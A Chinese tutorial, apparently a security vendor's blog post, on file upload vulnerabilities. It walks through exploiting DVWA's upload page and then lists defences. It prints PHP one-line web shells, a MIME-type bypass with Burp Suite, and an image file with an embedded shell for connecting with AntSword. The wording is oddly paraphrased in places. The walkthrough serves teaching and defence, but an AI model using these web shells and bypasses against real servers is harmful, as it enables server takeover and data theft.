01 漏洞先容
文件上传(File Upload)是大部分Web运用都具备的功能,例如用户上传附件、修正头像、分享图片/视频等。正常的文件一样平常是文档、图片、视频等,Web运用网络之后放入后台存储,须要的时候再调用出来返回。
如果恶意文件如PHP、ASP等实行文件绕过Web运用,并顺利实行,则相称于黑客直接拿到了Webshell,则可以拿到Web运用的数据,删除Web文件,本地提权,进一步拿下全体做事器乃至内网。
02 文件上传漏洞事理
03 文件上传漏洞复现
利用DVWA靶场进行文件上传漏洞演习训练:
1.Low Security Level
查看源码:
这是最开始的页面:
我们考试测验上传桌面上的一个图片2.jpg
这时,我们来研究一下这个路径:../../hackable/uploads/2.jpg succesfully uploaded!
这是一个绝对路径,我们直接输入网址http://127.0.0.1/DVWA/hackable/uploads/2.jpg
这时候,我们考试测验上传桌面上的1.php文件,写入的内容为<?php phpinfo();?>
如图,1.php文件上传成功,做事器并未做任何过滤限定:
我们再次访问上传的路径:http://127.0.0.1/DVWA/hackable/uploads/1.php
解释存在文件上传漏洞,能够上传并且实行php文件
这个时候如果上传一句话木马:<?php @eval($_GET['joker']);?>
并用中国蚁剑进行连接,就可以得到这个做事器的Webshell
这样我们就可以访问这个做事器的任何文件夹,可见,文件上传漏洞的是非常具有危害性的。
2.Medium Security Level
查看源码:
源码中对上传的文件类型跟大小对进行了判断过滤,也便是说正常情形下,不能够上传不符合文件类型的文件。
我们用burpsuite抓包,将文件的上传类型修正为image/jepg
攻击成功后创造php文件上传成功
3.High Security Level
查看源码:
源代码严格限定了文件的后缀和内容:
php后缀名和php内容 ×
php后缀名和img内容 ×
img后缀名和php内容 ×
这时候,我们就可以把php假造成jpg绕过,也便是制作一句话图片木马,下图是用cmd制作的一句话图片木马:
用记事本打开可以瞥见这么一句话:<?php @eval($_POST['joker']);?>
然后我们就可以上传了,上传成功后,用中国蚁剑进行连接,就可以拿到Webshell权限。
04 防御方案
系统运行时的防御
1、文件上传的目录设置为不可实行。只要web容器无法解析该目录下面的文件,纵然攻击者上传了脚本文件,做事器本身也不会受到影响。
2、判断文件类型。在判断文件类型时,可以结合利用MIME Type、后缀检讨等办法。在文件类型检讨中,强烈推举白名单办法,黑名单的办法已经无数次被证明是不可靠的。此外,对付图片的处理,可以利用压缩函数或者resize函数,在处理图片的同时毁坏图片中可能包含的HTML代码。
3、利用随机数改写文件名和文件路径。文件上传如果要实行代码,则须要用户能够访问到这个文件。在某些环境中,用户能上传,但不能访问。如果运用了随机数改写了文件名和路径,将极大地增加攻击的本钱。再来便是像shell.php.rar.rar和crossdomain.xml这种文件,都将由于重命名而无法攻击。
4、单独设置文件做事器的域名。由于浏览器同源策略的关系,一系列客户端攻击将失落效,比如上传crossdomain.xml、上传包含Javascript的XSS利用等问题将得到办理。
5、利用安全设备防御。文件上传攻击的实质便是将恶意文件或者脚本上传到做事器,专业的安全设备防御此类漏洞紧张是通过对漏洞的上传利用行为和恶意文件的上传过程进行检测。恶意文件千变万化,隐蔽手腕也不断推陈出新,对普通的系统管理员来说可以通过支配安全设备来帮助防御。
系统开拓阶段的防御
对文件上传漏洞来说,最好能在客户端和做事器端对用户上传的文件名和文件路径等项目分别进行严格的检讨。客户真个检讨虽然对技能较好的攻击者来说可以借助工具绕过,但是这也可以阻挡一些基本的试探。做事器真个检讨最好利用白名单过滤的方法,这样能防止大小写等办法的绕过,同时还需对%00截断符进行检测,对HTTP包头的content-type也和上传文件的大小也须要进行检讨。
系统掩护阶段的防御
1、系统上线后运维职员应有较强的安全意思,积极利用多个安全检测工具对系统进行安全扫描,及时创造潜在漏洞并修复。
2、定时查看系统日志,web做事器日志以创造入侵痕迹。定时关注系统所利用到的第三方插件的更新情形,如有新版本发布建议及时更新,如果第三方插件被爆有安全漏洞更应立即进行修补。
3、对付全体网站都是利用的开源代码或者利用网上的框架搭建的网站来说,尤其要把稳漏洞的自查和软件版本及补丁的更新,上传功能非必选可以直接删除。除对系统自身的掩护外,做事器应进行合理配置,非必选一样平常的目录都应去掉实行权限,上传目录可配置为只读。
关于美创
杭州美创科技有限公司,敏感数据保护和数据安全领域的拓荒者和领导者,由海内多名数据库资深专家携手于2005年景立,产品及做事覆盖数据安全、数据管理、容灾备份、智能运维等四大领域,广泛运用于医疗、教诲、金融、政府、人社、电力能源、物流交通、企业等浩瀚行业。多年来,凭借卓越的技能创新与良好的用户口碑,美创多次入围全国网络安全50强,并参与多项国家及行业标准的编写,引领数据安全领域的规范发展。目前,美创科技已全面推动全国市场化发展计策,相继在北京、广州、武汉、南京、成都、上海等地设立分公司,致力于为更多的客户供应专业的安全办理方案。
